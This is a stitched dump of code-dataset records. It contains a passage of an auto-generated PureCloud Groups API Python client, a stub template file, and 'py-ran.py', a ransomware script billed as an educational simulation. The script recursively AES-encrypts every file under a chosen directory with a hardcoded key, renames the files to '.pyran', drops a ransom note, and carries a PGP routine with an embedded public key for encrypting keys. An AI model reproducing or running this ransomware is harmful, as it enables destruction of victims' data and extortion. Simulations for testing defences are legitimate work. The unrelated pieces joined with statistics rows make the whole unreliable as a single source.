auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group(self, group_id, **kwargs):
"""
Get group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group`")
resource_path = '/api/v2/groups/{groupId}'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group_individuals(self, group_id, **kwargs):
"""
Get all individuals associated with the group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group_individuals(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:return: UserEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group_individuals" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group_individuals`")
resource_path = '/api/v2/groups/{groupId}/individuals'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group_members(self, group_id, **kwargs):
"""
Get group members, includes individuals, owners, and dynamically included people
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group_members(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param int page_size: Page size
:param int page_number: Page number
:param str sort_order: Ascending or descending sort order
:param list[str] expand: Which fields, if any, to expand
:return: UserEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'page_size', 'page_number', 'sort_order', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group_members`")
resource_path = '/api/v2/groups/{groupId}/members'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UserEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_group_profile(self, group_id, **kwargs):
"""
Get group profile
This api is deprecated. Use /api/v2/groups instead
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_group_profile(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: groupId (required)
:param str fields: Comma separated fields to return. Allowable values can be found by querying /api/v2/fieldconfig?type=group and using the key for the elements returned by the fieldList
:return: GroupProfile
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'fields']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_group_profile" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `get_group_profile`")
resource_path = '/api/v2/groups/{groupId}/profile'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
if 'fields' in params:
query_params['fields'] = params['fields']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupProfile',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_groups(self, **kwargs):
"""
Get a group list
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_groups(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] id: id
:param list[str] jabber_id: A list of jabberIds to fetch by bulk (cannot be used with the \"id\" parameter)
:param str sort_order: Ascending or descending sort order
:return: GroupEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number', 'id', 'jabber_id', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_groups" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/groups'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'id' in params:
query_params['id'] = params['id']
if 'jabber_id' in params:
query_params['jabberId'] = params['jabber_id']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_groups_search(self, q64, **kwargs):
"""
Search groups using the q64 value returned from a previous search
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_groups_search(q64, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q64: q64 (required)
:param list[str] expand: expand
:return: GroupsSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q64', 'expand']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_groups_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'q64' is set
if ('q64' not in params) or (params['q64'] is None):
raise ValueError("Missing the required parameter `q64` when calling `get_groups_search`")
resource_path = '/api/v2/groups/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'q64' in params:
query_params['q64'] = params['q64']
if 'expand' in params:
query_params['expand'] = params['expand']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupsSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_profiles_groups(self, **kwargs):
"""
Get group profile listing
This api is deprecated. Use /api/v2/groups instead.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_profiles_groups(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int page_size: Page size
:param int page_number: Page number
:param list[str] id: id
:param str sort_order: Ascending or descending sort order
:return: GroupProfileEntityListing
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page_size', 'page_number', 'id', 'sort_order']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_profiles_groups" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/profiles/groups'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'page_size' in params:
query_params['pageSize'] = params['page_size']
if 'page_number' in params:
query_params['pageNumber'] = params['page_number']
if 'id' in params:
query_params['id'] = params['id']
if 'sort_order' in params:
query_params['sortOrder'] = params['sort_order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupProfileEntityListing',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_group_members(self, group_id, body, **kwargs):
"""
Add members
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_group_members(group_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param GroupMembersUpdate body: Add members (required)
:return: Empty
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_group_members" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `post_group_members`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_group_members`")
resource_path = '/api/v2/groups/{groupId}/members'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Empty',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_groups(self, body, **kwargs):
"""
Create a group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_groups(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupCreate body: Group (required)
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_groups`")
resource_path = '/api/v2/groups'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_groups_search(self, body, **kwargs):
"""
Search groups
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_groups_search(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param GroupSearchRequest body: Search request options (required)
:return: GroupsSearchResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_groups_search" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_groups_search`")
resource_path = '/api/v2/groups/search'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GroupsSearchResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def put_group(self, group_id, **kwargs):
"""
Update group
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_group(group_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str group_id: Group ID (required)
:param GroupUpdate body: Group
:return: Group
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['group_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'group_id' is set
if ('group_id' not in params) or (params['group_id'] is None):
raise ValueError("Missing the required parameter `group_id` when calling `put_group`")
resource_path = '/api/v2/groups/{groupId}'.replace('{format}', 'json')
path_params = {}
if 'group_id' in params:
path_params['groupId'] = params['group_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Group',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 37.450337 | 195 | 0.533636 | 4,367 | 44,491 | 5.252805 | 0.05885 | 0.026549 | 0.025502 | 0.023192 | 0.8901 | 0.878591 | 0.870962 | 0.870962 | 0.862854 | 0.861023 | 0 | 0.001961 | 0.381156 | 44,491 | 1,187 | 196 | 37.481887 | 0.831184 | 0.259401 | 0 | 0.836013 | 0 | 0 | 0.165067 | 0.013423 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024116 | false | 0 | 0.011254 | 0 | 0.059486 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2a017eb452b5c36599559fb12fde0d2833461422 | 85 | py | Python | __template__.py | brianjpetersen/tiny_id | cf14c6626ea5e0944298838d4c5108e6eaafa974 | [
"MIT"
] | null | null | null | __template__.py | brianjpetersen/tiny_id | cf14c6626ea5e0944298838d4c5108e6eaafa974 | [
"MIT"
] | 1 | 2015-10-14T12:44:28.000Z | 2015-10-14T12:44:28.000Z | __template__.py | brianjpetersen/tiny_id | cf14c6626ea5e0944298838d4c5108e6eaafa974 | [
"MIT"
] | null | null | null | # standard libraries
pass
# third party libraries
pass
# first party libraries
pass
| 10.625 | 23 | 0.788235 | 11 | 85 | 6.090909 | 0.545455 | 0.58209 | 0.537313 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 85 | 7 | 24 | 12.142857 | 0.957143 | 0.729412 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
2a5741b45ddce161e2eac904de3a7a6be66eb4ab | 70,752 | py | Python | py-ran.py | bschroed96/Py-Ran | 3ee5d04fd2e803ff3430396574227dc2c3af98ec | [
"MIT"
] | null | null | null | py-ran.py | bschroed96/Py-Ran | 3ee5d04fd2e803ff3430396574227dc2c3af98ec | [
"MIT"
] | null | null | null | py-ran.py | bschroed96/Py-Ran | 3ee5d04fd2e803ff3430396574227dc2c3af98ec | [
"MIT"
] | null | null | null | # coded by zer0_p1k4chu
# Simple Ransomware for blue/red teams to test their defenses against ransomwares. Purely for Educational purposes.
# Author not responsible for any damage caused by using this tool.
#!/usr/bin/python3
# import argparse
import os
import sys
import base64
import pyAesCrypt
import random
import string
# import PySimpleGUI as sg
import requests
import pgpy
from Cryptodome.Cipher import AES
from Cryptodome.Random import get_random_bytes
# parser = argparse.ArgumentParser()
# parser.add_argument("--dir",help="Location of the Folder you want to simulate")
# parser.add_argument("--mode",help="Accepts encrypt or decrypt arguments.")
# parser.add_argument("--password",help="Password to use for encryption/decryption.")
# args = parser.parse_args()
def EncryptFile(file,password):
bufferSize = 64 * 1024
pyAesCrypt.encryptFile(file, file+".pyran", password, bufferSize)
os.remove(file)
def DecryptFile(file,password):
bufferSize = 64 * 1024
pyAesCrypt.decryptFile(file, file.split(".pyran")[0], password, bufferSize)
os.remove(file)
def fast_encrypt(infile, pw):
if os.path.islink(infile):
infile = os.path.realpath(infile)
with open(infile, 'rb') as file_data:
key = bytes('floofloofloofloo', 'utf-8')
# print(str(key))
cipher = AES.new(key, AES.MODE_EAX)
ciphertext, tag = cipher.encrypt_and_digest(file_data.read())
with open(infile, 'wb') as file_out:
[ file_out.write(x) for x in (cipher.nonce, tag, ciphertext) ]
os.rename(infile, infile + '.pyran')
def fast_decrypt(infile, pw):
key = bytes(pw, 'utf-8')
if os.path.islink(infile):
infile = os.path.realpath(infile)
with open(infile, 'rb') as file_data:
nonce, tag, ciphertext = [ file_data.read(x) for x in (16, 16, -1) ]
cipher = AES.new(key, AES.MODE_EAX, nonce)
data = cipher.decrypt_and_verify(ciphertext, tag)
with open(infile, 'wb') as outfile:
outfile.write(data)
newname = infile.split(".pyran")[0]
os.rename(infile, newname)
def encrypt_data(password, dire='../azure_blob_analytics/'):
for file in [val for sublist in [[os.path.join(i[0], j) for j in i[2]] for i in os.walk(dire)] for val in sublist]:
# EncryptFile(file,password)
try:
fast_encrypt(file, password)
except (PermissionError, OSError) as e:
print(e)
continue
print("Encryption Done!")
f = open("ransom.txt","w+")
f.write("PY-RAN ransomware simulated successfully encrypted the files.")
f.close()
def decrypt_data(password, dire='../azure_blob_analytics/'):
for file in [val for sublist in [[os.path.join(i[0], j) for j in i[2]] for i in os.walk(dire)] for val in sublist]:
try:
fast_decrypt(file,password)
except (ValueError, FileNotFoundError) as e: # sometimes files that exist don't get decrypted??
# .DS_STORE file
print(e)
continue
print("Decryption Done!")
def generate_encryption_key(x):
key = string.ascii_letters
return (''.join(random.choice(key) for i in range(x)))
def pgp_encrypt(x):
pubkey = """LS0tLS1CRUdJTiBQR1AgUFVCTElDIEtFWSBCTE9DSy0tLS0tCgptUUdOQkdKR01YSUJEQURFbG9n
cVlBT2EvOVc0SUVHTjFBZGJucTZnTGUrNHFKc2V1S3lhaWZYMDdPTkgrczlLCkJ6N2QrVUFyeHdh
U1RuNjR2YXc5K240YUxVWk0zMVVyQldPa1pleDdCaWUxZWFwQ1hGdzZHbjNObDcweDVuUUEKcHQ3
NEFwU0ZJdWRTSFI3UXc5a2I4OWxZV3UzbnBaaDJ4Qk81bVhxd0pMZE5IUXVlbmQ3TGxlQ1gweWdh
U0ZRKwpPNHFORlRISS9ORDZKT29yVEV4OWp3aHJBL2NmWG9aZTFUdXI4ZXRoU2dkQlBLcEtJKzZ1
VFlLZFRKcHBJeDBsCkp3U3hXR3IyZktEMEx6cy83cE5tdXpqdk05d083Q2Zob3NlTk5GdUFudU1M
akxhUklrRUdNcE1jR1ZlZXFyeG4KSHo3MVhiWXRqUTNJa3VlWlJkeU8rdEhBOGRkak1WdVBCbnY4
NzdUWkE4WUxEcGFrUW8vcFhZU2tVeWt4TTR4TQpGaUNHVjRqWWJkek1Tb3QzRVQyNWVBREpjM3dR
SEw1MGhJQ0xucWRyR0VqNENPeEVFN2dVTjFmVkJKbTJIbnBPClBTYkF2TGlQQ3RYS0hUZEdVN3I3
MVZsbWptVjNzZktaODJGTFQxYU1NMEd3QW95Q01CYmhKM1BRTXR6SEZLUWcKTEoxWjZtZDdTOUdl
UG04QUVRRUFBYlFvWm14dmIyWWdQR3hoZG1Gc1pYUjBaV2hsWVd4MGFHTnZkVzVqYVd4QQpaMjFo
YVd3dVkyOXRQb2tCMUFRVEFRb0FQaFloQkJENDgwVjI4bFZlc0xFZ0dadnlEeWJJRTFBaEJRSmlS
akZ5CkFoc0RCUWtEd21jQUJRc0pDQWNDQmhVS0NRZ0xBZ1FXQWdNQkFoNEJBaGVBQUFvSkVKdnlE
eWJJRTFBaGlMOEwKK1FGK3ovSVVZWlg0WDZtcU8vWlBSMy9RNDE2SnNkSmVxc29CTHpvdVUrbVpv
cm1OTHJHbEZIWnd3VWpUTUp4ZAovZmN0cEdiaXJBZk9ra01CU0t6S0ZzeWhsWkRad1lOajcwK2RL
cXJKbityUHBXUnJuZzI5RkxSem9oRVhyQWdyClV3d0ZKdklOSTQyL2s5UTBZUVd6S1VLTDAvOE5N
VFdzemo2YnlNVkxVU3laZm40QlZzTHRJeHhlWEdrdUdvQW0KWkx5UDQzWUE2WWRXMTJRSEluOXlC
aVNiZE1Cd0g3bnNKRzdCK29ROGduNUd2aGNwLzlYeXp3NDRBS3d3b2JJSwpWNXBkc1p6RHF4MytE
TW5hR0V6Mnp4U244R2wxMHc5N09aU3pGd0RhVXFGVWw3VVZwL0xkbUFYQnB4TmlUZ0UrCmZRUlRo
YklQOHlobE9oY3c2TmYxNlovSnNRTjVVdXVqZ0ZMMnIzQTVmQm01WmJzd05yTVBFRXBCaVVsUkhM
cUgKLzQxTFhTRXpIS09XVjd1a2hBVDU5dTlFSXRUVzU1c3FXaUo1dDN6NWVSN3lCTUhTUlJvQks2
NW5ISDdkMjgxaAo2OXFlNWU0eXAwZStUZ2trREViUzR0WnR0K243RTM3RUdFZC95dW5WTGQyazc5
eFZadHdKRFVGdUZVMXNqeFhzClpia0JqUVJpUmpGeUFRd0F2WWtRaGd5aU12MCsyY0w2Q1BQQ1Jl
SzZhTU1sR1p2aVIzK1VhSGlHOFc0ZTNYd3AKMEZ0SytiZStSQ1pVS2l4TzBma3pxWlNHSjRLNkZP
b0l4bGdZU1ppcG8rOG1LS3Q4ZmZKL0MrVytjOS93YzNPNwpQSWVUZmM3Y1ZKWU1SbWF1MjBUUnBQ
QWh4Q2poeHpoZ0Y1Y3ZXRyt2cmJRT1N0OWtzRy91TGFpL0JIdnB0Vk5oCkdYc0NlaVI2R0F1bGY0
cC83TTR5QjZMUVEwck51eURUN2VCYjF5aWVTNnhHUmVpb2hNRXYyekE4RDNBcFRVSHMKRmRvSGpG
K1E0ckhhVVZpbVRza3VyNUtyRTB0RkxrTld0WENsV0drVWpVQXVCQ0lXNGMrTlJESzVHdnhOUHI2
YgpkaHREdHNraGp0TjFHQUdpOVRUb3NtUjcyaXFPZkJkNmFpMFNiVlVGcFozbm1MQjVXYWtkUkhZ
bi91RTVIS3NJCmczcktKbjhiMi9FTzhUMU5SL29NQ1phODhEQkRiNUZlUHViMHN3K3ZGdmpPcGNE
L3BPdlZ1ZkQyRDF2akkwcUMKQWdVZFZnbUJtdE1aMFN6WmFFQ3VybUg0RnluMGZGMnRYRFl3bTJp
aERVSUM4SzRhcUgyQXhyQWJZRGNzZkxxbQpXQ3UyYWhuenNWVnN3Um9OQUJFQkFBR0pBYndFR0FF
S0FDWVdJUVFRK1BORmR2SlZYckN4SUJtYjhnOG15Qk5RCklRVUNZa1l4Y2dJYkRBVUpBOEpuQUFB
S0NSQ2I4ZzhteUJOUUlSNXlDL3dNU1hMd3ZaK0lxcGZlNHdqaU11SUUKeHdvZEVXUE9FbXZwbDI4
TGgvY2ZPNm51UE5SRkRrVFFUVmFCOHpwcWlTWTFMS3hkbENPVnVraENqeTkrTkliQgpUcHYxS1NV
aHZIVFhQOGowcUkzRjBwUythdEJna0k1ZDI2WEZUK2JqaDFRM05tVTVSU01LZWNsYmJvbERCT3Ay
CjJSNUcydmp0aEtIUVNFZkdjOUFUTEU3aEE0djMwSGpzK2xlWVVoVGlXcTJzUDBaZ0JZQmxpTERS
UTlSUzlSMjUKcW9lbFA2T2RSaU5mNk9QVTFPdGdlSkdqZS9MRlRkbTF1ZUpuMGRnQ1Z4R1JHdTVT
S1FLcTRNcnlManJTYndJTApFb043RE9vVXdDZXN4WkorOVF3QkpzdXB5alhuWVpLU0Q1Q0RMVXd6
NTdTQ2xBL2ZUY1JTQzhLQlIvbzU3d2RDCmtNdnRvMEFJTWYvSVloczlualpOU0NOU2ltcWtjQzRm
c253NENsWHlaeURuYkZPK1oyYzdXZ3ZYWldleHpGVVkKUStnN1UrSFR5NFIyTDJnK2Z5ODlzWlBY
OVd1cXBwZ2ttTkdJczlqMnVQQ1QyRkNlRlRwQlc4ck1Fc3BmOU1vQgpjQ3hNRUlxOGtTZ2NTZ0pS
UjBsYnJSaGM5VHJONDdaci9sbmN0TzJpc3RJPQo9MmhDUgotLS0tLUVORCBQR1AgUFVCTElDIEtF
WSBCTE9DSy0tLS0tCg=="""
decoded_pubkey = base64.b64decode(pubkey)
key, _ = pgpy.PGPKey.from_blob(decoded_pubkey)
enc_key = pgpy.PGPMessage.new(x)
encrypted_x = key.encrypt(enc_key)
return str(encrypted_x)
if __name__ == '__main__':
# fast_encrypt("./test/test.txt", "floo")
# fast_decrypt()
# Define the window's contents
if len(sys.argv) > 1:
dir_to_enc = sys.argv[1]
encrypt_data('floofloofloofloo', dir_to_enc)
print("please enter your decryption key...")
while True:
